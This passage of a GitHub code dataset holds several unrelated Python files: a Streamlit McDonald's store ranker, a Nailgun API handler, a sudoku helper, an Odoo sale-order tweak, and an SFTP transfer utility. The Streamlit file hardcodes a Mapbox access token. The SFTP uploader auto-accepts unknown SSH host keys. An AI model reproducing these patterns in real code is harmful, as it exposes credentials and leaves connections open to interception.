sl.selectbox(\"Select your desired state: \", state)\ncount = 0\nfor states in dat['state']:\n if states == state_select:\n rank[count] += 3\n count += 1\ncities = []\nfor city in (dat[\"city\"][dat[\"state\"] == state_select]):\n if city not in cities:\n cities.append(city)\ncities.sort()\ncities.append(\"Not listed\")\ncity_select = sl.selectbox(\"Selected your desired city: \", cities)\ncount = 0\nfor city in dat['city']:\n if city == city_select:\n rank[count] += 2\n count += 1\n\ndef variants():\n\n sl.title(\"Store Ranker\")\n\n play = sl.radio(\"Are you coming with children?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"playplace\"]:\n if play == vals:\n rank[count] += 1\n count += 1\n\n thru = sl.radio(\"Are you in a rush?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"driveThru\"]:\n if thru == vals:\n rank[count] += 1\n count += 1\n\n arch = sl.radio(\"Do you have an Archcard gift card?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"archCard\"]:\n if arch == vals:\n rank[count] += 1\n count += 1\n\n wifi = sl.radio(\"Are you bringing your devices to the store?\", ('Y', 'N'))\n\n count = 0\n for vals in dat[\"freeWifi\"]:\n if wifi == vals:\n rank[count] += 1\n count += 1\n\n choice = []\n for choices in dat[\"storeType\"]:\n if choices not in choice:\n 
choice.append(choices)\n store_type = sl.selectbox(\"What else must be around the store? \", choice)\n count = 0\n for vals in dat[\"storeType\"]:\n if store_type == vals:\n rank[count] += 1\n count += 1\n\n dat[\"Rank\"] = rank\n df = dat.dropna()\n df = pd.DataFrame.to_csv(df, index=False)\ndef maps(state_select):\n\n sl.title(\"McDonald's In Your Area\")\n\n ICON_URL = \"https://upload.wikimedia.org/wikipedia/commons/thumb/3/36/McDonald%27s_Golden_Arches.svg/200px-McDonald%27s_Golden_Arches.svg.png\"\n\n icon_data = {\"url\": ICON_URL, \"width\": 242, \"height\": 242, \"anchorY\": 242,}\n dat[\"icon_data\"] = \"\"\n for i in dat.index:\n dat[\"icon_data\"][i] = icon_data\n loc = 0\n for vals in dat['city']:\n if vals == city_select:\n break\n loc += 1\n sl.pydeck_chart(pdk.Deck(\n layers=[\n pdk.Layer(\n type=\"IconLayer\",\n data=dat,\n get_icon='icon_data',\n get_size=5,\n size_scale=10,\n get_position='[lon, lat]',\n pickable=True, billboard=True),\n pdk.Layer(\n type=\"ScreenGridLayer\",\n data=dat,\n pickable=False,\n cell_size_pixels=25,\n color_range=[\n [25, 0, 0, 25], [50, 0, 0, 50], [76, 0, 0, 76], [101, 0, 0, 101], [127, 0, 0, 127],[152,0,0,152], [178, 0, 0, 178], [203, 0, 0 , 203], [255, 0, 0, 255]],\n opacity=0.4,\n get_position='[lon, lat]',\n get_weight= 'Rank > 0 ? Rank: 0')],\n map_style='mapbox://styles/mapbox/light-v9',\n mapbox_key= 'pk.eyJ1IjoiamdhdmVsIiwiYSI6ImNraXJwMjY1eDBiYWEycnFqdWVkbmd6N20ifQ.dKtTcikGLylstlqEuNwGpg',\n initial_view_state=pdk.ViewState(\n latitude=dat['lat'][loc],\n longitude=dat['lon'][loc],\n zoom=11, pitch=20),\n tooltip={\n \"html\": \"Store Number:
{storeNumber} City and State: {city} {state} , {zip}\"\n                    \"Store URL: {storeUrl} Store Phone number: {phone}\"\n                    \"Rating: {Rank} out of 10 
\",\n \"style\": {\"backgroundColor\": \"crimson\", \"color\": \"white\"}}))\n\ndef plot(state_select, rank):\n sl.title(\"Data Analysis\")\n\n fig, chart = plt.subplots()\n chart.hist(dat['Rank'][state_select == dat['state']], bins=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11], color='gold')\n chart.xaxis.set_label_text(\"Rating of the Stores\")\n chart.yaxis.set_label_text(\"Frequency of the Stores\")\n chart.set_xticks([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n chart.set_facecolor('crimson')\n fig.suptitle(f\"Histogram of the Ranked Stores in {state_select}\")\n sl.pyplot(fig)\n\n max_state = []\n max_city = []\n min_state = []\n min_city = []\n max_rank = dat['Rank'].max()\n min_rank = dat['Rank'].min()\n for i in dat.index:\n if dat['Rank'][i] == max_rank:\n max_state.append(dat['state'][i])\n max_city.append(dat['city'][i])\n if dat['Rank'][i] == min_rank:\n min_state.append(dat['state'][i])\n min_city.append(dat['city'][i])\n rand_select = random.randint(0, len(max_state) - 1)\n rand_selects = random.randint(0, len(min_state) - 1)\n if len(max_state) == 1:\n pronoun1 = \"is\"\n s1 = \"\"\n else:\n pronoun1 = \"are\"\n s1 = \"s\"\n if len(min_state) == 1:\n pronoun2 = \"is\"\n s2 = \"\"\n else:\n pronoun2 = \"are\"\n s2 = \"s\"\n sl.subheader(f\"There {pronoun1} {len(max_state)} store{s1} with the highest rating of {max_rank}, one such store is in {max_city[rand_select]}, {max_state[rand_select]}\")\n sl.subheader(f\"There {pronoun2} {len(min_state)} store{s2} with the lowest rating of {min_rank}, one such store is in {min_city[rand_selects]}, {min_state[rand_selects]}\")\n\n total = 0\n count = 1\n for vals in rank:\n total += vals\n count += 1\n mean= total / count\n\n return sl.subheader(f\"Mean rating = {mean}\")\ndef main():\n variants()\n maps(state_select)\n plot(state_select, rank)\nmain()\n","repo_name":"jakegavel/McDonalds","sub_path":"Final.py","file_name":"Final.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"39086896508","text":"import web\n\nfrom nailgun.api.v1.handlers import base\nfrom nailgun.api.v1.handlers.base import content\nfrom nailgun import objects\n\n\nclass DeploymentHistoryCollectionHandler(base.CollectionHandler):\n\n collection = objects.DeploymentHistoryCollection\n\n @content\n def GET(self, transaction_id):\n \"\"\":returns: Collection of JSONized DeploymentHistory objects.\n\n :http: * 200 (OK)\n * 404 (cluster not found in db)\n \"\"\"\n self.get_object_or_404(objects.Transaction, transaction_id)\n node_ids = web.input(nodes=None).nodes\n statuses = web.input(statuses=None).statuses\n\n if node_ids:\n node_ids = set(node_ids.strip().split(','))\n if statuses:\n statuses = set(statuses.strip().split(','))\n\n return self.collection.to_json(\n self.collection.get_history(\n transaction_id,\n node_ids,\n statuses)\n )\n","repo_name":"ReyhanehA/GDP43","sub_path":"104139_deployment_history.py_C__Users_user_Desktop_data_2_data_google_dat.py","file_name":"104139_deployment_history.py_C__Users_user_Desktop_data_2_data_google_dat.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"24925959100","text":"#this file is used to create the grid of a list\n#(now that I've realized my mistake, I know it would be better to use what I call lists in display.py\n#instead of grids but I'm too lazy to do that. 
I might do it some day, though)\ndef tf(s):\n #transforms single digit number strings into integers\n #if the input is not a single digit number string, it just returns \"\"\n #tf = transform\n s1=\"\"\n if s == \"0\":\n s1=0\n elif s == \"1\":\n s1=1\n elif s == \"2\":\n s1=2\n elif s == \"3\":\n s1=3\n elif s == \"4\":\n s1=4\n elif s == \"5\":\n s1=5\n elif s == \"6\":\n s1=6\n elif s == \"7\":\n s1=7\n elif s == \"8\":\n s1=8\n elif s == \"9\":\n s1=9\n return s1\ndef createGrid(list):\n #main function\n #creates the grid of a list\n grid=[\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"]\n a=0\n while a != 81:\n grid[a]=tf(list[a])\n a+=1\n return grid","repo_name":"GuePardo0/Sudoku-Solver","sub_path":"createGrid.py","file_name":"createGrid.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"14455327690","text":"# coding=utf-8\nfrom odoo import api, models\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n res = super(SaleOrder, self.with_context(mail_create_nosubscribe=True)).create(vals)\n return res\n\n @api.multi\n def action_confirm(self):\n res = super(SaleOrder, self.with_context(mail_create_nosubscribe=True)).action_confirm()\n for sale in self:\n partner_follower_id = sale.message_follower_ids.filtered(lambda f: f.partner_id == sale.partner_id)\n partner_follower_id.unlink()\n return res\n","repo_name":"fesquivelc/itdev_raptor","sub_path":"partner_invite_prevent_it/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"25939941226","text":"import os\nimport re\nimport time\nimport logging\nfrom os import listdir\nfrom os.path import isfile, join\nimport shutil\nimport paramiko\nimport socks\nimport socket\nimport sys\nimport typing\n\nfrom d22d.model import midhardware\nfrom d22d.utils import log_info\nfrom d22d.utils.ziputils import makedirs\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass ParamikoSftpClient(paramiko.SFTPClient):\n def cwd(self, path):\n self.chdir(path)\n\n def go_to_home(self, username):\n try:\n self.cwd('/home/' + username)\n except:\n self.cwd('/')\n\nNETWORK_ERR = (\n socket.timeout, # 直接断了\n EOFError, # 用代理断了\n socks.ProxyConnectionError, # 用代理的时候被拔网线\n OSError # 被拔网线\n)\n\nclass SftpController:\n # /!\\ Although the comments and variable names say 'file_name'/'file_anything' it inculdes folders also\n # Some functions in this class has no exception handling, it has to be done outside\n\n def __init__(self, host, port=22, username=' ', password=' '):\n # List to store file search and search keywords\n self.search_file_list = []\n self.detailed_search_file_list = []\n self.keyword_list = []\n\n # Variable to hold the max no character name in file list (used for padding in GUIs)\n self.max_len = 0\n self.max_len_name = ''\n\n # Variable to tell 
whether hidden files are enabled\n        self.hidden_files = False\n\n        self.work_dir_now = '/'\n\n        self.host = host\n        self.username = username\n        self.password = password\n        self.port = port\n\n    def connect_until_success(self, retry=0):\n        cnt_retry = 0\n        while True:\n            cnt_retry += 1\n            try:\n                log_info(f\"Attempting login [{cnt_retry}/{retry}] to [{self}]...\")\n                # first try without TLS, then retry with TLS\n                self.ftp = None\n                self.transport = paramiko.Transport((self.host, self.port))\n                self.transport.connect(username=self.username, password=self.password)\n                self.ftp = ParamikoSftpClient.from_transport(self.transport)\n                return\n            except Exception as inst:\n                if retry and cnt_retry > retry:\n                    raise inst\n                print_func = logger.error\n                if not isinstance(inst, NETWORK_ERR):\n                    print_func = logger.exception\n                print_func(f\"Login attempt [{cnt_retry}/{retry}] to [{self}] failed [{type(inst)}] {inst}, retrying in 5 seconds...\")\n                time.sleep(5)\n\n    def connect_to(self):\n        self.transport = paramiko.Transport((self.host, self.port))\n        self.transport.connect(username=self.username, password=self.password)\n        self.ftp = ParamikoSftpClient.from_transport(self.transport)\n        # self.ftp.go_to_home(self.username)\n\n    def toggle_hidden_files(self):\n        self.hidden_files = not self.hidden_files\n\n    def cwd_recode_path(self, path):\n        self.ftp.cwd(path)\n        if path.startswith('/'):\n            self.work_dir_now = self.format_realpath(path)\n        else:\n            old_path = self.work_dir_now\n            self.work_dir_now = self.format_realpath(os.path.join(old_path, path))\n\n    def walk(self, ftp_file_path):\n        old_path = self.work_dir_now\n        if ftp_file_path:\n            if ftp_file_path.startswith('/'):\n                ftp_file_path = self.format_realpath(ftp_file_path)\n            else:\n                ftp_file_path = self.format_realpath(os.path.join(self.work_dir_now, ftp_file_path))\n            self.cwd_recode_path(ftp_file_path)\n        else:\n            raise FileNotFoundError(ftp_file_path)\n        detailed_file_list = self.get_detailed_file_list(True)\n        file_list = self.get_file_list(detailed_file_list)\n        for file_name, file_details in zip(file_list, detailed_file_list):\n            r_fs = []\n            r_fns = []\n            pr = self.get_properties(file_details)\n            file_name = pr[0]\n            if file_name and file_name in ['.', '..']:\n                continue\n            if self.is_dir(file_details):\n                r_fs.append(file_name)\n                for root, fs, fns in self.walk(f\"{ftp_file_path}/{file_name}\"):\n                    yield root, fs, fns\n            else:\n                file_attribs, date_modified = pr[1], pr[2]\n                r_fns.append((file_name, file_attribs, date_modified, int(pr[-1] if pr[-1] else 0)))\n            yield ftp_file_path, r_fs, r_fns\n\n        if ftp_file_path:\n            self.cwd_recode_path(old_path)\n\n    def get_detailed_file_list(self, ignore_hidden_files_flag=False):\n        files = []\n        for attr in self.ftp.listdir_attr():\n            if (self.hidden_files is True or str(attr).split()[8][0] != '.') or ignore_hidden_files_flag is True:\n                files.append(str(attr))\n        return files\n\n    def get_file_list(self, detailed_file_list):\n        self.max_len = 0\n        self.max_len_name = ''\n        file_list = []\n        for x in detailed_file_list:\n            # Remove details and append only the file name\n            name = ' '.join(x.split()[8:])\n            file_list.append(name)\n            if (len(name) > self.max_len):\n                self.max_len = len(name)\n                self.max_len_name = name\n        return file_list\n\n    def get_detailed_search_file_list(self):\n        return self.detailed_search_file_list\n\n    def get_search_file_list(self):\n        self.max_len = 0\n        self.max_len_name = ''\n        for name in self.search_file_list:\n            if (len(name) > self.max_len):\n                self.max_len = len(name)\n                self.max_len_name = name\n        return self.search_file_list\n\n    def chmod(self, filename, permissions):\n        self.ftp.chmod(filename, permissions)\n\n    @staticmethod\n    
def format_realpath(path):\n if sys.platform == 'win32':\n res = str(os.path.realpath(path)).split(':', 1)[-1].replace('\\\\', '/')\n else:\n res = os.path.realpath(path)\n return res\n\n @staticmethod\n def format_path(path):\n if sys.platform == 'win32':\n res = str(path).replace('\\\\', '/')\n else:\n res = path\n return res\n\n def is_there(self, path):\n try:\n self.ftp.stat(path)\n return True\n except:\n return False\n\n def rename_dir(self, rename_from, rename_to):\n self.ftp.rename(rename_from, rename_to)\n\n def move_dir(self, rename_from, rename_to, status_command, replace_command):\n if (self.is_there(rename_to) is True):\n if (replace_command(rename_from, 'File/Folder exists in destination folder') is True):\n self.delete_dir(rename_to, status_command)\n else:\n return\n try:\n self.ftp.rename(rename_from, rename_to)\n status_command(rename_from, 'Moved')\n except:\n status_command(rename_from, 'Failed to move')\n raise\n\n def copy_file(self, file_dir, copy_from, file_size, status_command, replace_command):\n # Change to script's directory\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(abspath)\n os.chdir(dname)\n if not os.path.exists('copy_temps'):\n os.makedirs('copy_temps')\n os.chdir('copy_temps')\n # Save the current path so that we can copy later\n dir_path_to_copy = self.ftp.getcwd()\n # Change to the file's path and download it\n self.ftp.cwd(file_dir)\n self.download_file(copy_from, file_size, status_command, replace_command)\n # Change back to the saved path and upload it\n self.ftp.cwd(dir_path_to_copy)\n self.upload_file(copy_from, file_size, status_command, replace_command)\n # Delete the downloaded file\n os.remove(copy_from)\n status_command(copy_from, 'Deleted local file')\n\n def copy_dir(self, file_dir, copy_from, status_command, replace_command):\n # Change to script's directory\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(abspath)\n os.chdir(dname)\n if not os.path.exists('copy_temps'):\n os.makedirs('copy_temps')\n os.chdir('copy_temps')\n # Save the current path so that we can copy later\n dir_path_to_copy = self.ftp.getcwd()\n # Change to the file's path and download it\n self.ftp.cwd(file_dir)\n self.download_dir(copy_from, status_command, replace_command)\n # Change back to the saved path and upload it\n self.ftp.cwd(dir_path_to_copy)\n self.upload_dir(copy_from, status_command, replace_command)\n # Delete the downloaded folder\n shutil.rmtree(copy_from)\n status_command(copy_from, 'Deleting local directory')\n\n def delete_file(self, file_name, status_command):\n try:\n self.ftp.remove(file_name)\n status_command(file_name, 'Deleted')\n except:\n status_command(file_name, 'Failed to delete')\n raise\n\n def delete_dir(self, dir_name, status_command):\n # Go into the directory\n self.ftp.cwd(dir_name)\n # Get file lists\n try:\n detailed_file_list = self.get_detailed_file_list(True)\n except:\n status_command(dir_name, 'Failed to delete directory')\n raise\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If directory\n if (self.is_dir(file_details)):\n self.delete_dir(file_name, status_command)\n # If file\n else:\n self.delete_file(file_name, status_command)\n # Go back to parent directory and delete it\n try:\n self.ftp.cwd('..')\n status_command(dir_name, 'Deleting directory')\n self.ftp.rmdir(dir_name)\n except:\n status_command(dir_name, 'Failed to delete directory')\n raise\n\n def upload_file(self, file_name, file_size, 
status_command, replace_command):\n # Function to update status\n def upload_progress(transferred, remaining):\n status_command(file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Check if the file is already present in ftp server\n if (self.is_there(file_name)):\n if (replace_command(file_name, 'File exists in destination folder') is False):\n return\n # Try to upload file\n try:\n status_command(file_name, 'Uploading')\n self.ftp.put(file_name, file_name, callback=upload_progress)\n status_command(None, 'newline')\n except:\n status_command(file_name, 'Upload failed')\n raise\n\n def upload_dir(self, dir_name, status_command, replace_command):\n # Change to directory\n os.chdir(dir_name)\n # Create directory in server and go inside\n try:\n if (not self.is_there(dir_name)):\n self.ftp.mkdir(dir_name)\n status_command(dir_name, 'Creating directory')\n else:\n status_command(dir_name, 'Directory exists')\n self.ftp.cwd(dir_name)\n except:\n status_command(dir_name, 'Failed to create directory')\n raise\n # Cycle through items\n for filename in os.listdir():\n # If file upload\n if (isfile(filename)):\n self.upload_file(filename, os.path.getsize(filename), status_command, replace_command)\n # If directory, recursive upload it\n else:\n self.upload_dir(filename, status_command, replace_command)\n\n # Got to parent directory\n self.ftp.cwd('..')\n os.chdir('..')\n\n def sftp_mkdir_p(self, remote_path):\n if remote_path == \"/\":\n # absolute path so change directory to root\n self.ftp.chdir(\"/\")\n return\n if remote_path == \"\":\n # top-level relative directory must exists\n return\n try:\n # sub-directory exists\n self.ftp.chdir(remote_path)\n except IOError:\n dirname, basename = os.path.split(remote_path.rstrip(\"/\"))\n self.sftp_mkdir_p(dirname)\n self.ftp.mkdir(basename)\n self.ftp.chdir(basename)\n\n def upload_file_to_some_where(\n self, local_path, remote_folder, remote_filename='',\n status_command=log_info, check_ftp_file_same=False, append_offset=0):\n # TODO 断点续传\n if not os.path.exists(local_path):\n raise SystemError(f'本地路径不存在:{local_path.__repr__()}')\n if not remote_folder:\n raise SystemError(f'远程路径错误:{remote_folder.__repr__()} {remote_filename}')\n if not remote_filename:\n remote_folder, remote_filename = os.path.split(remote_folder)\n\n if not remote_folder.startswith('/'):\n remote_folder = self.format_realpath(os.path.join(self.work_dir_now, remote_folder))\n remote_path = os.path.join(remote_folder, remote_filename)\n old_path = self.work_dir_now\n if remote_folder:\n # Create directory in server and go inside\n try:\n if (not self.is_there(remote_folder)):\n self.sftp_mkdir_p(remote_folder)\n status_command(remote_folder, 'Creating directory')\n else:\n status_command(remote_folder, 'Directory exists')\n self.ftp.cwd(remote_folder)\n except Exception as e:\n status_command(remote_folder, 'Failed to create directory')\n raise e\n\n self._upload_file_to_some_where(local_path, remote_path, status_command, check_ftp_file_same, append_offset)\n self.work_dir_now = old_path\n self.cwd_recode_path(old_path)\n\n def _upload_file_to_some_where(\n self, local_path, remote_path, status_command=log_info,\n check_ftp_file_same=False, append_offset=0, windows=1024 * 8 * 128):\n file_size = os.stat(local_path).st_size\n\n # Function to update status\n def upload_progress(transferred, remaining):\n status_command(local_path, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Try to upload file\n try:\n status_command(local_path, 
'Uploading')\n self.ftp.put(local_path, remote_path, callback=upload_progress)\n file_list = self.ftp.listdir(os.path.dirname(remote_path))\n remote_name = os.path.basename(remote_path)\n f_local = open(local_path)\n\n if remote_name in file_list:\n f_remote = self.ftp.open(remote_path, \"a\")\n stat = self.ftp.stat(remote_path)\n if check_ftp_file_same:\n f_remote_tmp = self.ftp.open(remote_path, \"r\")\n try:\n r_data = f_remote_tmp.read(windows)\n l_data = f_local.read(len(r_data))\n status_command(\n f\"正在检查远程sftp服务器已经存在的文件路径上传的文件和本地文件一致性:\\n\",\n f\"本地:{l_data[:70]}\\n远程:{r_data[:70]}\\n本地{len(l_data)}=?远程{len(r_data)}: {l_data == r_data}\")\n if l_data == r_data:\n self.is_same_file = True\n status_command(\n f\"文件开头800KB一致,准备开始断点续传,已经上传的文件大小:{stat.st_size / 1024 / 1024:.3f}MB\", )\n else:\n self.is_same_file = False\n raise SystemError(f'远程文件路径[\"{self}{remote_path}:1\"]已存在,而且本地文件开头800KB与服务器文件不一致,请检查')\n raise StopIteration('只是检查文件开头一致性,不需要全部下载')\n finally:\n f_remote_tmp.close()\n\n stat = self.ftp.stat(remote_path)\n f_local.seek(stat.st_size)\n if append_offset:\n f_remote.seek(append_offset)\n else:\n f_remote = self.ftp.open(remote_path, \"w\")\n\n tmp_buffer = f_local.read(windows)\n while tmp_buffer:\n f_remote.write(tmp_buffer)\n tmp_buffer = f_local.read(windows)\n f_remote.close()\n f_local.close()\n status_command(None, 'newline')\n except Exception as e:\n status_command(remote_path, f'Upload failed [{type(e)}] {e}')\n raise e\n\n def download_file(self, ftp_file_name, file_size, status_command, replace_command):\n # Function to update progress\n def download_progress(transferred, remaining):\n status_command(ftp_file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Check if the file is already present in local directory\n if isfile(ftp_file_name):\n if replace_command(ftp_file_name, 'File exists in destination folder') is False:\n return\n # Try to download file\n try:\n status_command(ftp_file_name, 'Downloading')\n self.ftp.get(ftp_file_name, ftp_file_name, callback=download_progress)\n status_command(None, 'newline')\n except Exception:\n status_command(ftp_file_name, 'Download failed')\n raise\n\n def download_dir(self, ftp_dir_name, status_command, replace_command):\n # Create local directory\n try:\n if not os.path.isdir(ftp_dir_name):\n os.makedirs(ftp_dir_name)\n status_command(ftp_dir_name, 'Created local directory')\n else:\n status_command(ftp_dir_name, 'Local directory exists')\n os.chdir(ftp_dir_name)\n except Exception:\n status_command(ftp_dir_name, 'Failed to create local directory')\n raise\n # Go into the ftp directory\n self.ftp.cwd(ftp_dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list(True)\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If directory\n if (self.is_dir(file_details)):\n self.download_dir(file_name, status_command, replace_command)\n # If file\n else:\n self.download_file(file_name, int(self.get_properties(file_details)[3]), status_command,\n replace_command)\n # Got to parent directory\n self.ftp.cwd('..')\n os.chdir('..')\n\n def get_size(self, ftp_file_name):\n res = int(self.ftp.stat(ftp_file_name).st_size) or 0\n return res\n\n def _download_file_to_some_where( self, ftp_file_name, local_path,\n file_size, status_command):\n # Function to update progress\n def download_progress(transferred, remaining):\n status_command(ftp_file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + 
'%')\n\n # Try to download file\n try:\n status_command(ftp_file_name, 'Downloading')\n self.ftp.get(ftp_file_name, local_path, callback=download_progress)\n status_command(None, 'newline')\n except Exception as e:\n status_command(ftp_file_name, 'Download failed')\n raise e\n\n def download_file_to_some_where(self, ftp_file_name, local_path, local_file_name='',\n file_size=0, status_command=log_info, replace_command=log_info):\n if not local_path:\n raise SystemError(f'路径错误:{local_path.__repr__()}')\n if isfile(ftp_file_name):\n if replace_command(ftp_file_name, 'File exists in destination folder') is False:\n return\n # Try to open file, if fails return\n if not local_file_name:\n local_file_name = os.path.basename(ftp_file_name)\n\n makedirs(local_path, check_dot=False)\n local_path = self.format_path(os.path.join(local_path, local_file_name))\n\n if not file_size:\n file_size = self.get_size(ftp_file_name)\n\n self._download_file_to_some_where(ftp_file_name, local_path, file_size, status_command)\n return local_path\n\n def search(self, dir_name, status_command, search_file_name):\n # Go into the ftp directory\n self.ftp.cwd(dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list()\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If file_name matches the keyword, append it to search list\n if search_file_name.lower() in file_name.lower():\n if (self.ftp.getcwd() == '/'):\n dir = ''\n else:\n dir = self.ftp.getcwd()\n self.search_file_list.append(dir + '/' + file_name)\n self.detailed_search_file_list.append(file_details)\n status_command(dir + '/' + file_name, 'Found')\n # If directory, search it\n if (self.is_dir(file_details)):\n status_command(file_name, 'Searching directory')\n self.search(file_name, status_command, search_file_name)\n # Goto to parent directory\n self.ftp.cwd('..')\n\n def clear_search_list(self):\n del self.search_file_list[:]\n del self.detailed_search_file_list[:]\n\n def get_dir_size(self, dir_name):\n size = 0;\n # Go into the ftp directory\n self.ftp.cwd(dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list()\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n if (self.is_dir(file_details)):\n size += self.get_dir_size(file_name)\n else:\n size += int(self.get_properties(file_details)[3])\n # Goto to parent directory\n self.ftp.cwd('..')\n # return size\n return size\n\n def cwd_parent(self, name):\n if ('/' not in name): return name\n parent_name = '/'.join(name.split('/')[:-1])\n if (parent_name == ''): parent_name = '/'\n self.ftp.cwd(parent_name)\n return ''.join(name.split('/')[-1:])\n\n def mkd(self, name):\n self.ftp.mkdir(name)\n\n def pwd(self):\n return (self.ftp.getcwd())\n\n def get_properties(self, file_details):\n details_list = file_details.split()\n # Get file attributes\n file_attribs = details_list[0]\n # Get date modified\n date_modified = ' '.join(details_list[5:8])\n # Remove the path from the name\n file_name = ' '.join(details_list[8:])\n # Get size if it is not a directory\n if ('d' not in file_details[0]):\n file_size = details_list[4]\n return [file_name, file_attribs, date_modified, file_size]\n else:\n return [file_name, file_attribs, date_modified]\n\n def is_dir(self, file_details):\n return 'd' in file_details[0]\n\n def disconnect(self):\n if self.ftp:\n self.ftp.close()\n\n\nclass ParamikoFolderUploader(object):\n \"\"\"\n 
Folder upload implemented with paramiko\n    \"\"\"\n\n    def __init__(self, host, port, user, password, local_dir: str, remote_dir: str,\n                 path_pattern_exluded_tuple=('/.git/', '/.idea/', '/dist/', '/build/'),\n                 file_suffix_tuple_exluded=('.pyc', '.log', '.gz'),\n                 only_upload_within_the_last_modify_time=3650 * 24 * 60 * 60,\n                 file_volume_limit=1000 * 1000, sftp_log_level=20):\n        \"\"\"\n        :param host:\n        :param port:\n        :param user:\n        :param password:\n        :param local_dir:\n        :param remote_dir:\n        :param path_pattern_exluded_tuple: paths matching any of these regexes are excluded outright\n        :param file_suffix_tuple_exluded: files ending with these suffixes are excluded\n        :param only_upload_within_the_last_modify_time: only upload files modified within this window, in seconds\n        :param file_volume_limit: files larger than this are not uploaded, in bytes.\n        \"\"\"\n        self._host = host\n        self._port = port\n        self._user = user\n        self._password = password\n\n        self._local_dir = str(local_dir).replace('\\\\', '/')\n        if not self._local_dir.endswith('/'):\n            self._local_dir += '/'\n        self._remote_dir = str(remote_dir).replace('\\\\', '/')\n        if not self._remote_dir.endswith('/'):\n            self._remote_dir += '/'\n        self._path_pattern_exluded_tuple = path_pattern_exluded_tuple\n        self._file_suffix_tuple_exluded = file_suffix_tuple_exluded\n        self._only_upload_within_the_last_modify_time = only_upload_within_the_last_modify_time\n        self._file_volume_limit = file_volume_limit\n\n        # noinspection PyTypeChecker\n        t = paramiko.Transport((host, port))\n        t.connect(username=user, password=password)\n        self.sftp = paramiko.SFTPClient.from_transport(t)\n\n        ssh = paramiko.SSHClient()\n        ssh.load_system_host_keys()\n        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n        ssh.connect(host, port=port, username=user, password=password, compress=True)\n        self.ssh = ssh\n\n    def _judge_need_filter_a_file(self, filename: str):\n        ext = filename.split('.')[-1]\n        if '.' + ext in self._file_suffix_tuple_exluded:\n            return True\n        for path_pattern_exluded in self._path_pattern_exluded_tuple:\n            # print(path_pattern_exluded,filename)\n            if re.search(path_pattern_exluded, filename):\n                return True\n        file_st_mtime = os.stat(filename).st_mtime\n        volume = os.path.getsize(filename)\n        if time.time() - file_st_mtime > self._only_upload_within_the_last_modify_time:\n            return True\n        if volume > self._file_volume_limit:\n            return True\n        return False\n\n    def _make_dir(self, dirc, final_dir):\n        \"\"\"\n        sftp.mkdir cannot create deeply nested directories in a single call, so recurse to create parents first.\n        :param dirc:\n        :param final_dir:\n        :return:\n        \"\"\"\n        # print(dir,final_dir)\n        try:\n            self.sftp.mkdir(dirc)\n            if dirc != final_dir:\n                self._make_dir(final_dir, final_dir)\n        except (FileNotFoundError,):\n            parent_dir = os.path.split(dirc)[0]\n            self._make_dir(parent_dir, final_dir)\n\n    def upload(self):\n        for parent, dirnames, filenames in os.walk(self._local_dir):\n            for filename in filenames:\n                file_full_name = os.path.join(parent, filename).replace('\\\\', '/')\n                if not self._judge_need_filter_a_file(file_full_name):\n                    remote_full_file_name = re.sub(f'^{self._local_dir}', self._remote_dir, file_full_name)\n                    try:\n                        logger.debug(f'Uploading file, local: {file_full_name} --> remote: {remote_full_file_name}')\n                        self.sftp.put(file_full_name, remote_full_file_name)\n                    except (FileNotFoundError,) as e:\n                        # self.logger.warning(remote_full_file_name)\n                        self._make_dir(os.path.split(remote_full_file_name)[0], os.path.split(remote_full_file_name)[0])\n                        self.sftp.put(file_full_name, remote_full_file_name)\n                else:\n                    if '/.git' not in file_full_name and '.pyc' not in file_full_name:\n                        logger.debug(f'Skipping this file per the filter rules: {file_full_name}')\n\n\nclass SftpClientStore(midhardware.BaseStore):\n    def __init__(\n            self, host, port, user, password, location='/', 
